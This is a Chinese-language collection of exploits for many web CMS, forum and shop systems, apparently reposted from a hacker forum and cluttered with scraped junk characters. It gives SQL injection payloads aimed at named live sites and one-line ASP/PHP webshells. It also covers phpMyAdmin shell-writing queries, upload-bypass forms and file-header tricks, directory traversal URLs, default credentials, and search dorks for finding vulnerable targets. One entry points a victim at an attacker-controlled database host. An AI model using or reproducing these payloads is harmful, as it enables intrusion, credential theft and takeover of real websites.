启航企业建站系统 cookie注入漏洞通杀所有版本! w; n& L3 O1 \9 K) q
' u( [% J8 F3 [ k$ D3 u* [直接上exploit:
' F# k5 I; ]. ~, o; rjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));3 Q, s0 A; x; X9 b' Z( q
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
% M" t4 x0 p$ h6 l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: c8 q3 z; F3 R1 [
Asprain论坛 注册用户 上传图片就可拿到webshell* X* E$ G3 [3 Q* Y
$ l* ^; X' ~& c3 s" z5 Y m4 E
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。& ?: _7 ~. Y+ e# J7 F# u
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>+ r) Z2 K5 f! |8 T7 q* Y- w
2.gif 为一小图片文件,一定要小,比如qq表情图片
2 l( ~( d* V$ c" V3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
& G; G: A' \$ S$ v4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了( s& Z3 i( w2 w7 z# ?- R# v
5.q.asp;.gif5 e, R, D' b$ ~+ m& X1 ~
google:Powered by Asprain" M4 j$ b& L; |/ p) u" W" k
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! D" n. \& A; n) }' [1 Q. O. O+ a/ ]" ]
ShopNum1全部系统存在上传漏洞。
|6 K+ S4 D# X! W6 R g x' i( R) K* E
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。; n) S3 C/ r- V6 J: b/ {! u1 l
按说明 提示登录后台。。2 M: g d( T" z1 I6 D
在后台功能页面->附件管理->附件列表# B4 M T* i1 p; P% g
可以直接上传.aspx 后缀木马( j2 N' w5 K$ l! [( d
http://demo.shopnum1.com/upload/20110720083822500.aspx
0 H: O; E C1 E2 I3 J2 _--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! `* X1 P' q6 G, e; B( y" J
* X% q" S7 U6 M; |
牛牛CMS中小企业网站管理系统 上传漏洞
+ s& h" C& \) P, h
/ m' n' C# I9 h Y1 K牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。' W0 T* N" ~6 v9 d+ _' u- S
后台:admin/login.asp, c: v& j2 R+ I# q
ewebeditor 5.5 Nday
. ~) J h6 x9 ~5 h; c/ Pexp:
: H8 r+ k: }+ T- s<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
/ G$ I( S" N, M9 _: w2 v/ D<input?type=file?name=uploadfile?size=100><br><br>? }# c/ f4 E$ w1 F
<input?type=submit?value=upload>?
2 G, Z# {8 V8 B) O</form>
6 J: b9 n! t3 r4 Q' D* s9 v% w" nps:先上传小马.
0 `* _8 b* T W I" V) P2 Qinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏# f% @! z$ ?) Z- z5 W
0 ?$ h' Y" ?, f( H' I+ {
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 s$ r+ p+ p- F
% d; q8 C5 k% @0 z) |) }' fYothCMS 遍历目录漏洞% A. I9 y U& e! a7 T% O: O
, z' J" ]6 C8 N优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
) [2 h5 z8 r) B, \9 h! g! \: \默认后台:admin/login.asp
% b! T, U6 |7 h9 G/ {# x" m遍历目录:* e1 a. B2 a. j8 N
ewebeditor/manage/upload.asp?id=1&dir=../
/ y5 r9 i. w) P% M! {4 c2 n+ Fdata:
) P+ |& q( E' ]) e. yhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa2 D. {3 Y$ r: v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 T2 `0 Z+ z; u, y( R: i$ v8 r7 O$ V" i6 X( q' }5 M' P4 e
Net112企业建站系统 1.0
& N: A6 m# y7 _& W6 h( O
' B- o3 [6 D5 \3 b+ X/ v5 ~源码简介:, R, C6 K6 p6 b% x% o' _( V
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
' m- E, ^ ^5 h% h2 |添加管理员:
+ o* i: {- q2 B: I' A; Ohttp://www.0855.tv/admin/admin.asp?action=add&level=2
' H4 l( U: L6 V; `4 q/ X- h7 N$ P其实加不加都不是很重要,后台文件都没怎么作验证。; V9 E2 D1 h* |9 t: O/ W" M, y5 x5 M
上传路径:
" u" h- Q; T+ ]! I* ?. _ shttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2008 N5 i8 P# h+ s! u* G5 E7 V3 g$ [: z
http://www.0855.tv/inc/Upfile.asp?Stype=2
* u9 l" i) U( \" K1 W) e; n, {怎么利用自己研究。
9 K) c6 e' F' a遍历目录:
" a1 p4 N$ O$ t8 ]+ b! ?# B. v6 jhttp://www.0855.tv/admin/upfile.asp?path=../..' w+ e2 v& {, i P! m
如:
/ U4 c7 h7 |, T" Whttp://www.0855.tv/admin/upfile.asp?path=../admin8 w7 l% l/ b$ b- c5 ^, k6 P; e
http://www.0855.tv/admin/upfile.asp?path=../data( g' \# C- O/ V1 R4 G) [
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& o# Z+ j( K. o% |( L9 a: i5 b0 t, t
易和阳光购物商城通杀 上传漏洞
+ q: K* x4 I3 W' A- E
R; O- C1 q; T- x" C0 m前提要求是IIS6.0+asp坏境。
, ], y* n4 i1 i漏洞文件Iheeo_upfile.asp ) d" F" b) x* h
过滤不严.直接可以iis6.0上传
: r( ?9 B0 {* H- b+ }0 X: ]把ASP木马改成0855.asp;1.gif0 _3 A# j `" Z5 Y3 y$ N5 @
直接放到明小子上传
' z4 v! Y, j7 }+ CGoogle搜索:inurl:product.asp?Iheeoid=
\3 E1 d! d+ x* I3 J9 ^2 |--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& m/ ~9 W. r( e+ J" y9 }9 I) `+ d
" q/ o* f& S: h, T
phpmyadmin后台4种拿shell方法
3 D( j6 M% M7 U- ?' u# B1 e- J/ T5 L6 U: B3 X
方法一:, d; Z0 ~! B4 `- u6 J& n6 _
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );+ O& u: L3 u9 P0 \% q
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');' n6 L. W' P/ Z2 c; j! F2 }6 r
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
" ~ r2 f& u6 `! P----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php4 I& ?& f( F: B" w, k p
一句话连接密码:xiaoma& V4 M8 w5 [8 N5 F' d
方法二:, k/ x) M+ t1 x8 u6 M: A, l7 H1 p
Create TABLE xiaoma (xiaoma1 text NOT NULL);9 P4 g0 t- K; z1 I+ H
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');; x7 Q1 l+ L, N; [
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';' {. x5 [. f' j' @' p& X
Drop TABLE IF EXISTS xiaoma;4 a' P" @4 g7 `% Z* B
方法三:
+ J# ?. E8 W2 D读取文件内容: select load_file('E:/xamp/www/s.php');9 Y& s* l% {+ e' N% A% K
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
: p4 N5 P$ s, s5 rcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'. k0 d0 j, g" j' J) h- y( i: z
方法四:
6 \& t) f( R; d+ u- \: _/ F; Xselect load_file('E:/xamp/www/xiaoma.php');
/ h$ C9 a1 t; D4 ]- Pselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'/ B2 ]. c' X' Q* H9 v K" m4 s3 x- B
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir& Q V3 i, a8 l0 s
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" H) C) C. P: @7 O+ D) ~* b
4 \, x" q' I4 c! W4 {* C7 S6 P传信网络独立开发网站源码0day漏洞
& w8 @) G+ T8 W4 T; ?$ y/ t2 c& ^3 F: u6 h- {* K
后台system/login.asp- O! g4 D, U0 x
进了后台有个ewebeditor
% j6 w4 b( Y; X% U/ AGoogle 搜索inurl:product1.asp?tyc=
& x7 A) ?' {2 P1 R m2 R编辑器漏洞默认后台ubbcode/admin_login.asp, Z5 K% ]8 |( }( n+ n0 |
数据库ubbcode/db/ewebeditor.mdb
) R- I: @, }# v5 M7 [' `默认账号密码yzm 111111
: f7 O+ e! s8 k- I9 `0 S0 t m" x" _/ s' a1 B
拿webshell方法, ~% f1 }* ^; E
登陆后台点击“样式管理”-选择新增样式
5 ~4 e$ y+ M$ E) c样式名称:scriptkiddies 随便写
* c3 g( T0 s) l/ M, m# E' ]! f/ w0 H路径模式:选择绝对路径 ) l) G: M, D9 k9 d8 w
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
% R& a# t6 p$ {) F图片类型比如就是我们要上传的ASP木马格式, p. f& Q5 e) f4 y9 ]
上传路径:/6 m5 N7 i+ B0 T" P9 v
图片限制:写上1000 免的上不了我们的asp木马/ z D) [ h! e3 ?; J% n7 w, h
上传内容不要写
" ~3 _5 p" S# i. A, A$ g可以提交了 8 i) M; B2 S9 q5 D
样式增加成功!
4 H6 L, `, H4 I0 K3 ~: m, o [返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 2 T8 R* l( a& f5 k* u; H; n
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置* X* a/ Y2 @) R9 j% {( E, X
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
$ O3 V, [8 E8 e9 ^- J0 Y上ASP木马 回车 等到路径
& M( w9 w1 H$ ?1 h- L+ t7 j- b
4 A. b# C, O: x( r& v后台:system/login.asp' V8 L+ H; E& W1 a' }. [$ _+ R+ v
Exp:" h( C2 J/ A% c8 B
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master1 E( t* N) J/ Z! S9 @/ E
测试:. b+ ]+ T3 }/ j( y! x
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master3 }& x4 E. ]( `! `/ x/ X" P$ z
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
7 |) _$ W* C( d2 o0 z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 n/ c7 t, T0 Q0 ^8 s
5 F1 j5 r, |: K! P \7 Dfoosun 0day 最新注入漏洞
8 [6 W. \* [; S S3 R8 S+ S
" {' Y, T/ c. I4 d/ p漏洞文件:www.xxx.com/user/SetNextOptions.asp
. ~, n% n% c! D- U# Q# {利用简单的方法:
" X9 t# d6 w1 s7 f; n7 H暴管理员帐号:
. u1 ~9 j8 _5 U5 s$ h8 ihttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
- Q/ z6 k" e& z暴管理员密码:! B8 _5 |7 R/ D& L( w& t' T- {
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
! O8 h/ q. i; }! l3 p1 e- V--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) h2 m6 d4 @. G4 f" D: O+ }& u: h$ H, G
2 p( H. B' {. K: P0 T$ Y- T
网站程序的版权未知!* J; |: e) ^8 ^
9 z* i5 A' J0 ^( V
默认网站数据库:5 {! H6 o: {# n; k: Y4 m5 J+ d+ X
www.i0day.com/data/nxnews.mdb
, N3 J9 b4 r- O0 _! eewebeditor 在线编辑器:
2 k! N# {( M2 f X+ L: k5 o编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
% F" {) X7 Q6 G9 Z6 w0 S U登录地址:ewebeditor/admin_login.asp
' p" O; P. }; E# `默认密码:admin admin
* E! A8 n) M# v* B e登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
& ?! t0 n: |4 @5 c/ l& x$ h# C [( i4 L8 x. u: y% G, M/ ^# h
Sql注入漏洞:
7 F: @) |) {2 U$ M7 x! K7 Ohttp://www.i0day.com/detail.asp?id=12/ l5 g- d/ e# j
exp:$ Q' T# F; ^0 K+ A( {. ?0 h9 s
union select 1,admin,password,4,5,6,7,8 from admin& o* J B. k/ U
爆出明文帐号/密码: n+ v$ n6 l6 Z& S9 h* g
3 D- h# J, Z) E+ h: r
上传漏洞:
6 k3 M: I d2 w4 ~* l3 z O) {6 ~7 a后台+upfile.asp
4 q# \" v* k7 G2 Q! M8 p, N9 ]4 n如:
8 \+ A) \3 e5 ~0 J. Ahttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
: j0 c Z1 s. Wshell的地址:网址+后台+成功上传的马
- C( p) k' F- z( F- x- k' Ogoogle:inurl:news.asp?lanmuName=
' Q) e- O6 Q" D: _0 p% A------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 J5 }8 r) U+ J' \: W( P9 |* X) J0 ]: c6 j7 g6 ?
dedecms最新0day利用不进后台直接拿WEBSHELL
$ s; K; }: l' F8 l% n8 f8 G
+ G+ r, E- W+ Q; l4 C1 T% R( c6 @% ?拿webshell的方法如下:% o/ J0 y8 b, `" k
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
- q) W' R. a, {前题条件,必须准备好自己的dede数据库,然后插入数据:" ~, \" z7 `$ w Z( R: E" {
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); - L% K7 ]1 |6 q b, B, d" w$ K: P. g
' L1 U- Q. i. m/ f; @2 Z6 |0 {
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
. `: P$ ~( H2 Z- e<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
$ S9 q: Q1 Y3 P: f<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />$ Y. {- R5 t1 ?: y0 P, e+ u
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
! f0 C1 M9 i% w3 w<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
3 j# d0 Y3 [9 t& s9 @- v8 x<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />8 I9 l, e: B" o
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
2 \8 v: K1 ~2 L% L<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />/ X. n6 v4 c" y P2 c
<input type="text" value="true" name="nocache" style="width:400">% g" g9 X2 p- f8 `% s
<input type="submit" value="提交" name="QuickSearchBtn"><br />
( B3 e" R- n$ H- o ~</form>
# `1 H- q0 o. [3 a<script>
5 _7 d. y/ U4 c! nfunction addaction()- O4 q) s- F! }1 {
{- e+ g* u3 N0 T+ t; p H+ N% j
document.QuickSearch.action=document.QuickSearch.doaction.value;$ M. \- \7 x' j* `+ r6 `
}0 w# ?2 @. e* T* S7 _8 Z
</script>
9 I+ f3 z6 X& M' l-----------------------------------------------------------------------------------------------------------------------------------------------
7 o p. E% [1 t
7 U- C* o' E3 C% s1 h+ T* Gdedecms织梦暴最新严重0day漏洞
. d+ P- A3 |. s1 y. Gbug被利用步骤如下:
3 |2 r) Q6 Y/ |% khttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root. r6 b. m+ o- I
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
8 B) K( P6 n$ {, b. V1 p$ c-------------------------------------------------------------------------------------------------------------------------------------------
. n! X- I# b7 z/ X. o
# i* i: B) \$ w: h多多淘宝客程序上传漏洞
8 s5 v* v: w3 i/ R" O6 g. l4 U0 T漏洞页面:
% g# r* ?4 M0 s; ?2 Zadmin\upload_pic.php
+ n& ]- M+ Z. T3 l. P$ G* q8 X- g9 X传送门:
) C _; l$ ]2 ~6 D3 Ghttp://www.www.com/admin/upload_pic.php?uploadtext=slide1; d1 K, s6 Y& [" T
PS:copy张图片马 直接 xxx.php 上传抓包地址!! H2 u7 P4 z4 b1 K6 j
------------------------------------------------------------------------------------------------------------------------------------------------------
4 [2 F8 U/ o5 K; d0 m& E
7 t" J; S ]. ?1 t/ P- ^4 K无忧公司系统ASP专业版后台上传漏洞
3 m6 B8 [! g$ y/ G* l2 T漏洞文件 后台上传
' P: n d, J; I4 [4 uadmin/uploadPic.asp, t6 A# {7 V' i5 j! ^
漏洞利用 这个漏洞好像是雷池的
- a/ _8 s7 R- C( [; ^ Dhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=16 K n6 D% P" g0 U
等到的webshell路径:$ O! J9 K4 H& B& r
/UploadFiles/scriptkiddies.asp;_2.gif0 J6 I' t6 q% n8 S
---------------------------------------------------------------------------------------------------------------------------------------------------8 `' m- o% i5 Y# I
5 o$ z- H9 Y8 l' O6 Q住哪酒店分销联盟系统2010
8 |; E, M* T' I" I0 e; G( f! w. y jSearch: J; e3 }; D- v4 h
inurl:index.php?m=hotelinfo
7 e1 {8 ~9 r1 }. ]( y6 hhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin" h2 s9 {- d& Y$ ~9 G) r
默认后台:index.php?m=admin/login
2 R+ ^4 r. ^$ K5 o--------------------------------------------------------------------------------------------------------------------------------------------------% x% f+ m0 g6 M
7 W5 Z/ J0 e9 r- ?) P
inurl:info_Print.asp?ArticleID=
4 |" H6 X, D& d) r9 H) C后台 ad_login.asp/ |* o M* E7 y2 D+ }% m
爆管理员密码:
# `8 I- P2 T' A) F2 K/ [3 l4 @# [union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin& A) p2 t6 n& A) h, V
------------------------------------------------------------------------------------------------------------------------------------------------------------- d A, R: M, o$ _ ?
% ]7 ^0 V2 L# ?- g9 @% Q搜索框漏洞!9 y$ o5 _$ |. ?2 [! y; r+ h
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='' n5 w% h2 \6 O4 h# L
--------------------------------------------------------------------------------------------------------------------------------------------------------: K- q/ O+ ^1 Y d! p) E
! d! O$ }) G# [
关键字:
2 Z6 h7 I/ |. R9 d& Q& R! {inurl:/reg_TemletSel.asp?step=2 T% V1 L2 t% F& T
或者1 ^! M7 `4 W& |( ~& h* `
电子商务自助建站--您理想的助手8 Q3 ~1 x' |5 s- ]! |$ k: X; T
-------------------------------------------------------------------------------------------------------------------------------------------------2 d' L j- E3 K
- {* m( n5 V' l8 ~7 ^7 s1 h
iGiveTest 2.1.0注入漏洞# N* s7 d" q% F5 x# t) w9 h
Version: <= 2.1.0
- `/ l! Q O* d3 v. h$ |# Homepage: http://iGiveTest.com// d9 ~* d/ q5 O. a
谷歌关键字: “Powered by iGiveTest”
% m8 a/ t$ C: f5 h/ r8 Y U: F' M) O随便注册一个帐号。然后暴管理员帐号和密码
6 a) m; K5 G2 j+ ]4 Khttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
& M4 H8 i) D8 Q8 z) k------------------------------------------------------------------------------------------------------------------------------------------------
3 A- N+ y6 I- v
4 Q9 B B) k7 K% p3 SCKXP网上书店注入漏洞3 l2 O4 f5 k8 a& Z( G0 i
工具加表:shop_admin 加字段:admin0 S* }& f9 R) w! {& T5 _
后台:admin/login.asp 0 w9 R! z" B. {
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
]0 j4 r) j% N0 [9 g. ~inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息" g0 _3 f* ?/ H/ G6 P" S% b* s6 s9 `
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& x6 f- M8 H) m" d/ h
1 v0 C% ^% d* m% D S8 E4 q* P段富超个人网站系统留言本写马漏洞
4 e4 p$ V5 b- ^0 X源码下载:http://www.mycodes.net/24/2149.htm: h. F% f- `. K- ?; ?' X+ M
addgbook.asp 提交一句话。
+ B w- _( s# F& {$ I+ U$ P连接: http://www.xxxx.tv/date/date3f.asp
+ P* s7 {& b+ lgoogle:为防批量,特略!0 _8 P! D h$ C
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ r. C, j0 |( q- a t! ]5 u2 J
0 i- J* R+ b2 X4 Z$ g* d
智有道专业旅游系统v1.0 注入及列目录漏洞
$ S7 J! z8 `6 T4 {默认后台路径:/admin/login.asp! r$ x7 j' @9 `, _4 H0 X
默认管理员:admin
6 A# v3 s0 A6 w+ a6 K默认密码:1234563 n: Q7 T5 q# M6 I6 R8 c
SQL EXP Tset:9 z4 d7 E" a. }' P+ L
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin. N( y1 E: A8 O2 K/ Q
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 B6 C$ |7 |% y2 a5 H Q! A+ N/ p6 s& y# b
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
) V. E9 M _) I L* j+ e' {0 CEXP:6 k! V. y) U% u v- Q6 ^
<title>eWebeditoR3.8 for php任意文件上EXP</title>
8 k7 L4 c& z4 B# C! Z<form action="" method=post enctype="multip
7 t5 W" J4 _5 |& Y. p" E6 Nart/form-data">
3 n7 A& ^0 p, E0 Q<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
8 \% K$ v+ D1 v" U( l! L4 ?URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
& {2 V* n6 p* e- c( X R<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> & o2 b. S5 h% K7 w
file:<input type=file name="uploadfile"><br> 4 E3 ^) l- b9 E1 C2 D7 Q
<input type=button value=submit onclick=fsubmit()>
2 `* r! u$ @* z</form><br> ) o& j- _" V; I& M6 g3 H2 w
<script>
7 D# l: j8 k8 Z8 c: |( I" ]* H- ?) {function fsubmit(){
4 r9 d$ G/ ~( V+ P sform = document.forms[0]; ( U) t$ ?# b& I! v6 [6 e
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 1 A" T! t' W" o% v- l; E' ~( w
alert(form.action); ! f- ^1 J* v# I. X' ]" S' s# o/ D
form.submit();
* }! J/ u& K' R( J* V0 S! w7 M} / h2 v% ^# H# ~$ Q8 G s- q
</script>
5 q- t D$ |, W) _8 U* T注意修改里面ewebeditor的名称还有路径。
# x' O$ o8 s9 S$ U---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 y7 K3 R' y4 X8 X$ C/ V6 k \+ G
/ J/ i$ f7 h( n6 e9 [! Z; i提交’时提示ip被记录 防注入系统的利用
6 D" g5 M5 q/ T% |. a网址:http://www.xxx.com/newslist.asp?id=122′. X9 e; j+ o& A& A( F. z
提示“你的操作已被记录!”等信息。
! ~5 ]0 M1 t6 u, x利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。$ d0 a M. _# o1 x
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: t" ]" }- A6 F4 T$ A* I- r% t. ?& f
西部商务网站管理系统 批量拿shell-0day
9 I ~; u; H5 f: D- K9 g$ D/ H这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 8 A3 x4 B3 o* X) s# Y- p: r2 Z
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
- Q, A2 l( @6 j2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
; L' W0 ?! p8 \9 U/ @; |8 H3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂/ h% I% @7 @- Z0 n- \+ B
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 G# ?" [# {2 @/ g- X4 l$ d9 B
( S9 V6 e1 y+ A; {
JspRun!6.0 论坛管理后台注入漏洞" U2 L1 H. X- r
! B) r( A9 G/ v, w# FSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
O3 x8 J# g) ~/ `* J* u( GJspRun!6.0 / o7 ]% S- c! q9 s9 V
漏洞描述:
) P1 G( Q9 M) zJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。5 y: ]- ]/ ^8 d
在处理后台提交的文件中ForumManageAction.java第1940行
& u/ s. l7 K' C& y- j {2 GString export = request.getParameter("export");//直接获取,没有安全过滤" W+ m- |5 Y" c
if(export!=null){
- e7 x, Z" o0 K% _3 O5 F& KList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
6 J1 ]7 Y1 J: r- D/ T: c- Sif(styles==null||styles.size()==0){
; H' N$ u% z& ~& T5 `" T<*参考+ @0 R) ]& L. A
nuanfan@gmail.com# H& j7 \, t% c3 T$ c0 A8 t
*> SEBUG安全建议:9 q$ y( E/ Z: Q9 |: @
www.jsprun.net
" p2 x) E# {/ c0 r: H6 v6 y$ Y3 X(1)安全过滤变量export
) x% p5 p2 f* U% @+ X# s d$ u(2)在查询语句中使用占位符
2 l0 j K( i0 ^( F7 x% p------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# Z0 C }$ Z& f6 l) v3 u( ?
4 A, C( q8 {3 e6 T7 b5 W乌邦图企业网站系统 cookies 注入9 S$ }4 Z2 @9 P' y1 E+ e0 {; g- m
* B+ j- Q# ~5 L- Z1 y: V% T1 j程序完整登陆后台:/admin/login.asp
; ]* \. v8 g/ t! f* _% b默认登陆帐号:admin 密码:admin8886 l! g/ w/ l3 a' x
语句:(前面加个空格)* x9 }) \/ {+ W& S* S
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
2 c: F: \+ V o或者是16个字段:( D2 G( H4 q* m: p# x' N( K4 [/ ^
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin v; d+ g3 h; ~& X6 p
爆不出来自己猜字段。2 I1 L0 [: s9 G# Q& W
注入点:http://www.untnt.com/shownews.asp?=888 i& m( m- z: x$ x
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp! e. U% p) Q$ v: _
关键字:
; U( K! ^! H( W7 f- i( R& Linurl:shownews?asp.id=
$ }$ \! Z8 T4 l-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 P }; h: F$ X* ~7 C' V
$ b0 y: |5 \6 nCKXP网上书店注入漏洞
2 P: S1 M, N+ k
; [7 v+ J2 j3 z8 m* y工具加表:shop_admin 加字段:admin
1 d* d, g2 @8 J/ C3 P后台:admin/login.asp 3 A* z/ f; }3 k* M! I
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
( Y' G5 g; Q% b; rinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息) }2 y- T8 K- a; {7 j
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------" }' C* P3 T L# e3 K0 L. ~
% }2 Y" q/ G: f) A) m
YxShop易想购物商城4.7.1版本任意文件上传漏洞
' Y$ a. }3 k( y9 m. R$ w
. v* o, I( P, G7 S& ?http://xxoo.com/controls/fckedit ... aspx/connector.aspx
' A& `0 x: B6 K* q4 C4 X5 v( s/ c跳转到网站根目录上传任意文件。3 N/ K, E4 j4 E; P
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件% ^" i" ?0 F0 }& `, c( K( B
